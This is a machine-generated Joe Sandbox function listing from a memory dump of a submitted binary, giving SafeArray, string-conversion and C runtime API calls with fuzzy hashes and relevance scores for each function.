Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: f06bc167a3be090fc61322523fac80c870a2acc472aa92f01d8c4089ae22675f
Instruction ID: 60349d4b7bb31783e4c0cf4d5458790f70f1c588fa0589e955f6ec0850169943
Opcode Fuzzy Hash: f06bc167a3be090fc61322523fac80c870a2acc472aa92f01d8c4089ae22675f
Instruction Fuzzy Hash: 6E3129B1A116189FCB10CBA9CC84B9DB7B9AF89214F24858AE418E7652CB76DD818F50

Function 6CF201BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 936fd1d0300e8c5abd2ad93ae6a0f66566a4309807a174d6ac0f2e2fd64b3a05
Instruction ID: 7156a313d46ad88346163b6fca9eb2e87a052f90681d7443acd6f7d56e6532a0
Opcode Fuzzy Hash: 936fd1d0300e8c5abd2ad93ae6a0f66566a4309807a174d6ac0f2e2fd64b3a05
Instruction Fuzzy Hash: 6B315CB0E116189FDB10CFA9CC84B9DB7FAAF85214F34859AE418E7642CB76DD808F50

Function 6CF202C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 92ad0b4446cea240b4414431bf5d87ac5b0878a160c267cac382eb8852f29f10
Instruction ID: 4847d93967ad881b14f840f800b381723724655d076db51cf5f0b497d113d4f4
Opcode Fuzzy Hash: 92ad0b4446cea240b4414431bf5d87ac5b0878a160c267cac382eb8852f29f10
Instruction Fuzzy Hash: D5314BB0A116189FCB10CFA9CC84B9DB7B9AF89214F70868AE418E7642CB76DD408F50

Function 6CF203DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1c58ddac3f30264862050ea1652f3ab5f4feb798e5f5f4388a3e600655f8205a
Instruction ID: 731e21963ba11d2260959b5cb95a4095d77b3b1c0f9bd522fddebacd093fbe4f
Opcode Fuzzy Hash: 1c58ddac3f30264862050ea1652f3ab5f4feb798e5f5f4388a3e600655f8205a
Instruction Fuzzy Hash: 50314B70E116189FCB10CFA9CC84B9DB7B9AF89214F70868AE418E7651CB76DD808F50

Function 6CF1FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 38920bd62fbb6a0c3221fc67faee64abf0cf24c79ce55824f253d56a1311ea96
Instruction ID: f34cf62bab7affd4bf7191e909dfe84b47f1ca6d55d395f6af05b4e4417694ce
Opcode Fuzzy Hash: 38920bd62fbb6a0c3221fc67faee64abf0cf24c79ce55824f253d56a1311ea96
Instruction Fuzzy Hash: 06313CB0E116189FCB10CFA9CC84B9DB7B9AF89214F74858AE418E7641CB76ED418F50

Function 6CF29011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0905d762109ecf5e7ca238f0bff9ed6b8441717716064202a0b9c07b5d1efb04
Instruction ID: 5de8e57e9ef01ea5fd21fa404fb364140a5b0da2887a049174e1e82a1aabc8b8
Opcode Fuzzy Hash: 0905d762109ecf5e7ca238f0bff9ed6b8441717716064202a0b9c07b5d1efb04
Instruction Fuzzy Hash: 39314C70E01A189FCB10DBA9CC80B9EF7F9AF89204F24868AE419E7645DB75DD41CF50

Function 6CF7249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CF725B1,?,00000000,?), ref: 6CF724E6
_malloc.LIBCMT ref: 6CF7251B
_memset.LIBCMT ref: 6CF7253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CF72550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CF7255E
__freea.LIBCMT ref: 6CF72568

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: 4c7a3111d91eb307b332657650100f7a9aef85d55a72989bebf580c9e1c9fbe2
Instruction ID: 038b6d95fcda5262251dfa275388bbd92b74148d800be7639c763e5382306625
Opcode Fuzzy Hash: 4c7a3111d91eb307b332657650100f7a9aef85d55a72989bebf580c9e1c9fbe2
Instruction Fuzzy Hash: FA318FB1610209EFEF108F69EC94EAF7BADEB08358F114426F914D6650E731DD648B60

Function 6CF28A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CF269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF26A08
Part of subcall function 6CF269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF26A15
Part of subcall function 6CF269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF26A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: cd5a5ffa27324ce4ef660851997dd5f1cbf919810754028db50e4f7f56e368f4
Instruction ID: 6a24a7771be7d8c8d9668b57b034465971d94421a8742054c77642287916fc7a
Opcode Fuzzy Hash: cd5a5ffa27324ce4ef660851997dd5f1cbf919810754028db50e4f7f56e368f4
Instruction Fuzzy Hash: 2C312F71E01A189FCB10DBA9CC80B9EB7FAAF85704F24468AE419E7641C775DD85CF50

Function 6CF287EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CF269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF26A08
Part of subcall function 6CF269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF26A15
Part of subcall function 6CF269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF26A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 821f89b6536895cec0c1e30348a01911aa9e2882e8d1929d60ae81ac10458dca
Instruction ID: 3c77dd4c18fd7611c4d35ac79fd9c3185783f57c0da22d94aaa0a9f50fc40ef3
Opcode Fuzzy Hash: 821f89b6536895cec0c1e30348a01911aa9e2882e8d1929d60ae81ac10458dca
Instruction Fuzzy Hash: E5315C71E01A189FCB10CBA9CC80B9EB7FAAF85304F20468AE419E7641CB79DD85CF50

Function 6CF1FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CF269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF26A08
Part of subcall function 6CF269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF26A15
Part of subcall function 6CF269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF26A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 821f89b6536895cec0c1e30348a01911aa9e2882e8d1929d60ae81ac10458dca
Instruction ID: 5eb0bd01aa2e54b9c506f7cc0f9f70f977dbc47db4b8afcc4108d79f9934c085
Opcode Fuzzy Hash: 821f89b6536895cec0c1e30348a01911aa9e2882e8d1929d60ae81ac10458dca
Instruction Fuzzy Hash: A4314F70E116189FCB14CFA9CC84B9DB7BAAF85314F70458AE458E7641CB76DD848F50

Function 6CF1FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CF269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF26A08
Part of subcall function 6CF269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF26A15
Part of subcall function 6CF269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF26A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: cd5a5ffa27324ce4ef660851997dd5f1cbf919810754028db50e4f7f56e368f4
Instruction ID: d2947c1946e743de7082e5055abe142595967b3770697809e08f3ba094f61036
Opcode Fuzzy Hash: cd5a5ffa27324ce4ef660851997dd5f1cbf919810754028db50e4f7f56e368f4
Instruction Fuzzy Hash: CF313E70E116189FCB14CBA9CC84B9DB7BAAF85314F70468AE419E7641CB76DD808F50

Function 6CF606A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04760: __CxxThrowException@8.LIBCMT ref: 6CF047F9

_memmove.LIBCMT ref: 6CF60907
_memmove.LIBCMT ref: 6CF60936
_memmove.LIBCMT ref: 6CF60959
__CxxThrowException@8.LIBCMT ref: 6CF60A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6CF609E3

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: 25c412b774e9dfff1837f34d8dbc45a7a9bce618742c11d26202c69de617e85b
Instruction ID: f5ac8e7599ef59ac900010c79e8faf4f008b3d5198067af36231ac78e5b639b6
Opcode Fuzzy Hash: 25c412b774e9dfff1837f34d8dbc45a7a9bce618742c11d26202c69de617e85b
Instruction Fuzzy Hash: 15C167756083819FD714CF29C880B6BBBE6AFC9304F148A5DE58987785DB70E905CBA2

Function 6CF67FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF680EA

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

RandomNumberType, xrefs: 6CF683A9
Max, xrefs: 6CF683E3
Min, xrefs: 6CF683C5
invalid bit length, xrefs: 6CF68044

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: Max$Min$RandomNumberType$invalid bit length
API String ID: 3718517217-2498579642
Opcode ID: b8c7469be2e340f07e406cdf540e298fc7d9f4a62d942b16bdd1d96a4f81ebf8
Instruction ID: ddf4c1e7a062095525cc330b062b36778468788f904b935a185632f56bfdb7bb
Opcode Fuzzy Hash: b8c7469be2e340f07e406cdf540e298fc7d9f4a62d942b16bdd1d96a4f81ebf8
Instruction Fuzzy Hash: 23C1A0715097809BE325CB68D850BCFB7E5BFDA304F444A1EE68983B91DB749908C7A3

Function 6CF6BE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6CF6BEB6

Part of subcall function 6CF6AB70: __getptd.LIBCMT ref: 6CF6AB7E
Part of subcall function 6CF6AB70: __getptd.LIBCMT ref: 6CF6AB8C

__getptd.LIBCMT ref: 6CF6BEC0

Part of subcall function 6CF6EAE6: __getptd_noexit.LIBCMT ref: 6CF6EAE9
Part of subcall function 6CF6EAE6: __amsg_exit.LIBCMT ref: 6CF6EAF6

__getptd.LIBCMT ref: 6CF6BECE
__getptd.LIBCMT ref: 6CF6BEDC
__getptd.LIBCMT ref: 6CF6BEE7
_CallCatchBlock2.LIBCMT ref: 6CF6BF0D

Part of subcall function 6CF6AC15: __CallSettingFrame@12.LIBCMT ref: 6CF6AC61

Part of subcall function 6CF6BFB4: __getptd.LIBCMT ref: 6CF6BFC3
Part of subcall function 6CF6BFB4: __getptd.LIBCMT ref: 6CF6BFD1

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

